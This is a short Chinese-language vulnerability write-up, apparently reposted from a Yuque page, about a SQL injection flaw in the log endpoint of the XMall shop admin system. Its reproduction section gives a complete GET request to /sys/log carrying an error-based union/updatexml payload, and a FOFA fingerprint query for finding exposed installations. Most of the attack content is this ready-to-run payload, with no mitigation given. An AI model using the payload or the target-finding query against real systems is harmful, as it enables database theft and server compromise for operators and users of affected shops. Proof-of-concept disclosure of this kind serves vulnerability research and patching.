登录 白背景

XMall商城log存在SQL注入漏洞

一、漏洞描述

<font style="color:rgb(38, 38, 38);"> </font><font style="color:rgb(51, 51, 51);">XMall商城存在SQL注入漏洞,未经身份验证的攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。</font>

二、影响版本

XMall

三、资产测绘

app="XMall-后台管理系统"

1720974833579-d4f6443d-5d74-45ce-90ff-de780a92eff7.png

四、漏洞复现

GET /sys/log?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,user(),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136 HTTP/1.1
Host: 
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,or;q=0.7
Connection: close

1720975092052-33e27f98-8cc5-485e-b763-90326d4b5c51.png

原文: https://www.yuque.com/xiaokp7/ocvun2/mka17vbch913nlkr